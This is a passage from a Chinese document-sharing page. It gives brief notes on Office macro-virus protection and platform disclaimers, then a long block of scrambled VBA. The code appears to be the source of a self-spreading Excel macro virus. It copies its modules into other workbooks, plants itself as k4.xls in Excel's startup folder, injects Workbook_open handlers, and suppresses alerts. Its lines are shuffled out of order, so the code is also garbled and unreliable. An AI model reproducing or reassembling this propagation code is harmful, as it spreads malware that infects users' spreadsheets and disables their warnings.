在启动“宏病毒防护功能”的前提下,当打开一个自己写的文档时,系统会弹出相应的提示框。

同样是在启动“宏病毒防护功能”的情况下,office文档中一系列的文件都在打开时出现红警告。

由于在一般情况下很少使用到宏,所以当看到文本由宏警告时,就可以判断这些文档中有宏病毒。

如果软件中关于宏病毒防护选项启用后,不能再下次开机时依然保存。

word中提供了对病毒的防护功能,但有些宏病毒为了对付office中的提供的宏警告功能,他在感染系统后,会在每次退出office时自动屏蔽掉宏病毒防护选项。

7如果office文档在打开时,系统给出一个宏病毒警告框,那么则说说明系统感染了宏病毒。

感谢您的阅读,祝您生活愉快。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
If OverwriteExisting = True Then
If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
Err.Clear
Kill FName
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
If Err.Number = 9 Then
Else
copymodule = False
Exit Function
End If
If VBComp Is Nothing Then
ToVBProject.VBComponents.Import FileName:=FName
Else
If VBComp.Type = vbext_ct_Document Then
End If
If ToVBProject.Protection = vbext_pp_locked Then
copymodule = False
Exit Function
End If
On Error Resume Next
Set TempVBComp = ToVBProject.VBComponents.Import(FName)
With VBComp.CodeModule
.DeleteLines 1, .CountOfLines
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
Dim ExtPos As Long
Dim TempVBComp As VBIDE.VBComponent
If FromVBProject Is Nothing Then
copymodule = False
Exit Function
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"
End With
End Sub
Private Sub delete_this_wk()
Dim VBProj As VBIDE.VBProject
copymodule = False
Exit Function
End If
If FromVBProject.Protection = vbext_pp_locked Then
copymodule = False
Exit Function
S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
.InsertLines 1, S
End With
On Error GoTo 0
CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
Set VBComp = Nothing
Set VBComp = ToVBProject.VBComponents(CompName)
End Function
Function copymodule(ModuleName As String, _
FromVBProject As VBIDE.VBProject, _
ToVBProject As VBIDE.VBProject, _
OverwriteExisting As Boolean) As Boolean
Set VBComp = FromVBProject.VBComponents(ModuleName)
If Err.Number <> 0 Then
copymodule = False
Exit Function
End If
FName = Environ("Temp") & "\" & ModuleName & ".bas"
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule
Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "copystart wb"
If Err.Number <> 0 Then
copymodule = False
Exit Function
End If
End If
With ToVBProject.VBComponents
Call copytoworkbook
If Sheets(1).Name <> "Macro1" Then Movemacro4 ThisWorkbook
ThisWorkbook.Save
Application.ScreenUpdating = True
End If
End Sub
Set CodeMod = VBComp.CodeModule
With CodeMod
.DeleteLines 1, .CountOfLines
End With
End Sub
Function do_what()
If ThisWorkbook.Path <> Application.StartupPath Then
On Error Resume Next
Dim VBComp As VBIDE.VBComponent
Dim FName As String
Dim CompName As String
Dim S As String
Dim SlashPos As Long
RestoreAfterOpen
Call OpenDoor
Call Microsofthobby
Call ActionJudge
End If
End Function
Function copystart(ByVal wb As Workbook)
On Error Resume Next
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\k4.xls"
If WorkbookOpen("k4.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("k4.xls").Close False
.InsertLines 6, "Call do_what"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
Private Sub auto_open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Call delete_this_wk
End If
If Trim(ModuleName) = vbNullString Then
copymodule = False
Exit Function
End If
If ToVBProject Is Nothing Then
.Remove .Item(ModuleName)
相关文档
最新文档